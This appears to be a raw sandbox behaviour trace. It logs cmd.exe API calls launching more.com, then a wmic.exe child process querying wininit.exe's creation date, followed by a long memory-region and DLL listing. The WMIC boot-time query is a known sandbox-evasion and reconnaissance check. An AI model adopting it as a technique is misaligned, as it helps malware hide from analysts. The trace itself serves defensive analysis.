[0561.815] RtlSizeHeap (HeapHandle=0x420000, Flags=0x0, MemoryPointer=0x4398c0) returned 0x7e
[0561.815] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
[0561.815] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\more.*" (normalized: "c:\\windows\\system32\\more.*"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0x436080
[0561.816] FindClose (in: hFindFile=0x436080 | out: hFindFile=0x436080) returned 1
[0561.816] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\more.COM" (normalized: "c:\\windows\\system32\\more.com"), fInfoLevelId=0x1, lpFindFileData=0x2eef90, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2eef90) returned 0x436080
[0561.816] FindClose (in: hFindFile=0x436080 | out: hFindFile=0x436080) returned 1
[0561.816] _wcsicmp (_String1=".COM", _String2=".BAT") returned 1
[0561.816] _wcsicmp (_String1=".COM", _String2=".CMD") returned 2
[0561.816] GetConsoleTitleW (in: lpConsoleTitle=0x2ef4e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
[0561.817] InitializeProcThreadAttributeList (in: lpAttributeList=0x2ef298, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2ef258 | out: lpAttributeList=0x2ef298, lpSize=0x2ef258) returned 1
[0561.817] UpdateProcThreadAttribute (in: lpAttributeList=0x2ef298, dwFlags=0x0, Attribute=0x60001, lpValue=0x2ef248, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ef298, lpPreviousValue=0x0) returned 1
[0561.817] GetStartupInfoW (in: lpStartupInfo=0x2ef3b0 | out: lpStartupInfo=0x2ef3b0*(cb=0x68, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0))
[0561.817] lstrcmpW (lpString1="\\more.com", lpString2="\\XCOPY.EXE") returned -1
[0561.817] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\more.com", lpCommandLine="more ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x2ef2d0*(cb=0x70, lpReserved=0x0, lpDesktop="winsta0\\default", lpTitle="more ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef280 | out: lpCommandLine="more ", lpProcessInformation=0x2ef280*(hProcess=0x6c, hThread=0x5c, dwProcessId=0x4dc, dwThreadId=0x368)) returned 1
[0561.826] CloseHandle (hObject=0x5c) returned 1
[0561.826] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
[0561.827] GetProcessHeap () returned 0x420000
[0561.828] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x43fe40 | out: hHeap=0x420000) returned 1
[0561.828] GetEnvironmentStringsW () returned 0x43fe40*
[0561.828] GetProcessHeap () returned 0x420000
[0561.828] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x8, Size=0xb78) returned 0x4449e0
[0561.828] memcpy (in: _Dst=0x4449e0, _Src=0x43fe40, _Size=0xb78 | out: _Dst=0x4449e0) returned 0x4449e0
[0561.828] FreeEnvironmentStringsW (penv=0x43fe40) returned 1
[0561.828] GetProcessHeap () returned 0x420000
[0561.828] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x43a470 | out: hHeap=0x420000) returned 1
[0561.828] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef298 | out: lpAttributeList=0x2ef298)
[0561.828] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0
[0561.830] _close (_FileHandle=3) returned 0
[0561.831] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0
[0561.831] _close (_FileHandle=4) returned 0
[0561.832] WaitForSingleObject (hHandle=0x64, dwMilliseconds=0xffffffff) returned 0x0
[0566.701] GetExitCodeProcess (in: hProcess=0x64, lpExitCode=0x2ef7b8 | out: lpExitCode=0x2ef7b8*=0x0) returned 1
[0566.701] CloseHandle (hObject=0x64) returned 1
[0566.701] WaitForSingleObject (hHandle=0x6c, dwMilliseconds=0xffffffff) returned 0x0
[0566.701] GetExitCodeProcess (in: hProcess=0x6c, lpExitCode=0x2ef7b8 | out: lpExitCode=0x2ef7b8*=0x0) returned 1
[0566.701] CloseHandle (hObject=0x6c) returned 1
[0566.701] _get_osfhandle (_FileHandle=1) returned 0x7
[0566.701] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0566.702] _get_osfhandle (_FileHandle=1) returned 0x7
[0566.702] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a07e194 | out: lpMode=0x4a07e194) returned 1
[0566.702] _get_osfhandle (_FileHandle=0) returned 0x3
[0566.702] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a07e198 | out: lpMode=0x4a07e198) returned 1
[0566.703] SetConsoleInputExeNameW () returned 0x1
[0566.703] GetConsoleOutputCP () returned 0x1b5
[0566.703] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a08bfe0 | out: lpCPInfo=0x4a08bfe0) returned 1
[0566.704] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
[0566.704] exit (_Code=0)
Process:
id = "32"
image_name = "wmic.exe"
filename = "c:\\windows\\system32\\wbem\\wmic.exe"
page_root = "0x66376000"
os_pid = "0x520"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "31"
os_parent_pid = "0x740"
cmd_line = "WMIC PROCESS where name=\"wininit.exe\" get creationdate "
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f7b2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 4790
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 4791
start_va = 0x30000
end_va = 0xaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 4792
start_va = 0xb0000
end_va = 0xb3fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000b0000"
filename = ""
Region:
id = 4793
start_va = 0xc0000
end_va = 0xc0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000c0000"
filename = ""
Region:
id = 4794
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4795
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 4796
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 4797
start_va = 0xffa60000
end_va = 0xffaecfff
monitored = 1
entry_point = 0xffaacc30
region_type = mapped_file
name = "wmic.exe"
filename = "\\Windows\\System32\\wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")
Region:
id = 4798
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4799
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 4800
start_va = 0x7fffffd5000
end_va = 0x7fffffd5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 4801
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 4802
start_va = 0xd0000
end_va = 0x36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 4803
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4804
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4805
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4806
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 4807
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 4808
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 4809
start_va = 0xd0000
end_va = 0x136fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 4810
start_va = 0x270000
end_va = 0x36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000270000"
filename = ""
Region:
id = 4811
start_va = 0x7feff320000
end_va = 0x7feff3fafff
monitored = 0
entry_point = 0x7feff340760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 4812
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 4813
start_va = 0x7feff400000
end_va = 0x7feff41efff
monitored = 0
entry_point = 0x7feff4060e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 4814
start_va = 0x7feffba0000
end_va = 0x7feffcccfff
monitored = 0
entry_point = 0x7feffbeed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 4835
start_va = 0x7feff780000
end_va = 0x7feff982fff
monitored = 0
entry_point = 0x7feff7a3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 4836
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 4837
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 4838
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 4839
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 4840
start_va = 0x7feff600000
end_va = 0x7feff6d6fff
monitored = 0
entry_point = 0x7feff603274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 4846
start_va = 0x7fef5b50000
end_va = 0x7fef5b92fff
monitored = 0
entry_point = 0x7fef5b71b50
region_type = mapped_file
name = "framedynos.dll"
filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll")
Region:
id = 4861
start_va = 0x7fefda40000
end_va = 0x7fefda64fff
monitored = 0
entry_point = 0x7fefda49658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 4865
start_va = 0x7fefe210000
end_va = 0x7fefe280fff
monitored = 0
entry_point = 0x7fefe221e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 4866
start_va = 0x7feffcd0000
end_va = 0x7feffd1cfff
monitored = 0
entry_point = 0x7feffcd1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 4867
start_va = 0x7fefdf60000
end_va = 0x7fefdf67fff
monitored = 0
entry_point = 0x7fefdf61504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 4868
start_va = 0x7fefda10000
end_va = 0x7fefda1afff
monitored = 0
entry_point = 0x7fefda11030
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 4869
start_va = 0x7fefb670000
end_va = 0x7fefb696fff
monitored = 0
entry_point = 0x7fefb6798bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 4870
start_va = 0x7fefb660000
end_va = 0x7fefb66afff
monitored = 0
entry_point = 0x7fefb661198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 4871
start_va = 0x140000
end_va = 0x18ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000140000"
filename = ""
Region:
id = 4872
start_va = 0x370000
end_va = 0x46ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000370000"
filename = ""
Region:
id = 4873
start_va = 0x140000
end_va = 0x168fff
monitored = 0
entry_point = 0x141010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4874
start_va = 0x180000
end_va = 0x18ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000180000"
filename = ""
Region:
id = 4875
start_va = 0x470000
end_va = 0x5f7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 4876
start_va = 0x140000
end_va = 0x168fff
monitored = 0
entry_point = 0x141010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4877
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4878
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 4879
start_va = 0x600000
end_va = 0x780fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000600000"
filename = ""
Region:
id = 4880
start_va = 0x790000
end_va = 0x1b8ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000790000"
filename = ""
Region:
id = 4881
start_va = 0x140000
end_va = 0x14ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "wmic.exe.mui"
filename = "\\Windows\\System32\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\wmic.exe.mui")
Region:
id = 4882
start_va = 0x150000
end_va = 0x150fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000150000"
filename = ""
Region:
id = 4883
start_va = 0x160000
end_va = 0x160fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 4884
start_va = 0x190000
end_va = 0x20cfff
monitored = 0
entry_point = 0x19cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 4885
start_va = 0x190000
end_va = 0x20cfff
monitored = 0
entry_point = 0x19cec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 4886
start_va = 0x7fefda70000
end_va = 0x7fefda7efff
monitored = 0
entry_point = 0x7fefda71010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 4887
start_va = 0x1be0000
end_va = 0x1c5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001be0000"
filename = ""
Region:
id = 4888
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 4889
start_va = 0x170000
end_va = 0x170fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000170000"
filename = ""
Region:
id = 4890
start_va = 0x7fefe170000
end_va = 0x7fefe208fff
monitored = 0
entry_point = 0x7fefe171c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 4891
start_va = 0x190000
end_va = 0x190fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000190000"
filename = ""
Region:
id = 4892
start_va = 0x7fef8880000
end_va = 0x7fef888dfff
monitored = 0
entry_point = 0x7fef8885500
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 4893
start_va = 0x7fefa260000
end_va = 0x7fefa2d6fff
monitored = 0
entry_point = 0x7fefa29e7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 4894
start_va = 0x7fefd5e0000
end_va = 0x7fefd601fff
monitored = 0
entry_point = 0x7fefd5e5d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 4895
start_va = 0x1c60000
end_va = 0x1f2efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 4896
start_va = 0x7fef5970000
end_va = 0x7fef5b43fff
monitored = 0
entry_point = 0x7fef59a6b00
region_type = mapped_file
name = "msxml3.dll"
filename = "\\Windows\\System32\\msxml3.dll" (normalized: "c:\\windows\\system32\\msxml3.dll")
Region:
id = 4903
start_va = 0x1f30000
end_va = 0x204ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f30000"
filename = ""
Region:
id = 4904
start_va = 0x1a0000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001a0000"
filename = ""
Region:
id = 4905
start_va = 0x2050000
end_va = 0x212ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002050000"
filename = ""
Region:
id = 4906
start_va = 0x2130000
end_va = 0x226ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002130000"
filename = ""
Region:
id = 4907
start_va = 0x2270000
end_va = 0x238ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002270000"
filename = ""
Region:
id = 4908
start_va = 0x2390000
end_va = 0x259ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002390000"
filename = ""
Region:
id = 4909
start_va = 0x2390000
end_va = 0x24bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002390000"
filename = ""
Region:
id = 4910
start_va = 0x2520000
end_va = 0x259ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002520000"
filename = ""
Region:
id = 4911
start_va = 0x2130000
end_va = 0x21effff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 4912
start_va = 0x21f0000
end_va = 0x226ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021f0000"
filename = ""
Region:
id = 4913
start_va = 0x25a0000
end_va = 0x299ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000025a0000"
filename = ""
Region:
id = 4914
start_va = 0x1a0000
end_va = 0x1a0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "msxml3r.dll"
filename = "\\Windows\\System32\\msxml3r.dll" (normalized: "c:\\windows\\system32\\msxml3r.dll")
Region:
id = 4915
start_va = 0x1d0000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 4916
start_va = 0x1b0000
end_va = 0x1cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 4917
start_va = 0x7feffda0000
end_va = 0x7fefff17fff
monitored = 0
entry_point = 0x7feffda10e0
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 4918
start_va = 0x7fefdf70000
end_va = 0x7fefe099fff
monitored = 0
entry_point = 0x7fefdf710d4
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 4919
start_va = 0x7fefe290000
end_va = 0x7fefe4e8fff
monitored = 0
entry_point = 0x7fefe291340
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 4920
start_va = 0x7fefdde0000
end_va = 0x7fefdf4cfff
monitored = 0
entry_point = 0x7fefdde10b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 4921
start_va = 0x7fefdc20000
end_va = 0x7fefdc2efff
monitored = 0
entry_point = 0x7fefdc21020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 4922
start_va = 0x250000
end_va = 0x251fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000250000"
filename = ""
Region:
id = 4923
start_va = 0x7fefc6b0000
end_va = 0x7fefc8a3fff
monitored = 0
entry_point = 0x7fefc83c924
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 4924
start_va = 0x260000
end_va = 0x260fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "windowsshell.manifest"
filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest")
Region:
id = 4925
start_va = 0x1b90000
end_va = 0x1b91fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001b90000"
filename = ""
Region:
id = 4926
start_va = 0x7fefe4f0000
end_va = 0x7feff277fff
monitored = 0
entry_point = 0x7fefe56cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 4927
start_va = 0x260000
end_va = 0x260fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000260000"
filename = ""
Region:
id = 4928
start_va = 0x7fefdb80000
end_va = 0x7fefdb8efff
monitored = 0
entry_point = 0x7fefdb819b0
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 4929
start_va = 0x1ba0000
end_va = 0x1baffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\index.dat")
Region:
id = 4930
start_va = 0x1bb0000
end_va = 0x1bb7fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat")
Region:
id = 4931
start_va = 0x1bc0000
end_va = 0x1bcffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 4932
start_va = 0x1bc0000
end_va = 0x1bcffff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat")
Region:
id = 4933
start_va = 0x7fefbc00000
end_va = 0x7fefbc2cfff
monitored = 0
entry_point = 0x7fefbc01010
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 4934
start_va = 0x7fefe110000
end_va = 0x7fefe161fff
monitored = 0
entry_point = 0x7fefe1110d4
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 4935
start_va = 0x7fefd2b0000
end_va = 0x7fefd30afff
monitored = 0
entry_point = 0x7fefd2b6940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 4936
start_va = 0x29a0000
end_va = 0x2c0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000029a0000"
filename = ""
Region:
id = 4937
start_va = 0x7fefc4d0000
end_va = 0x7fefc525fff
monitored = 0
entry_point = 0x7fefc4dbbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
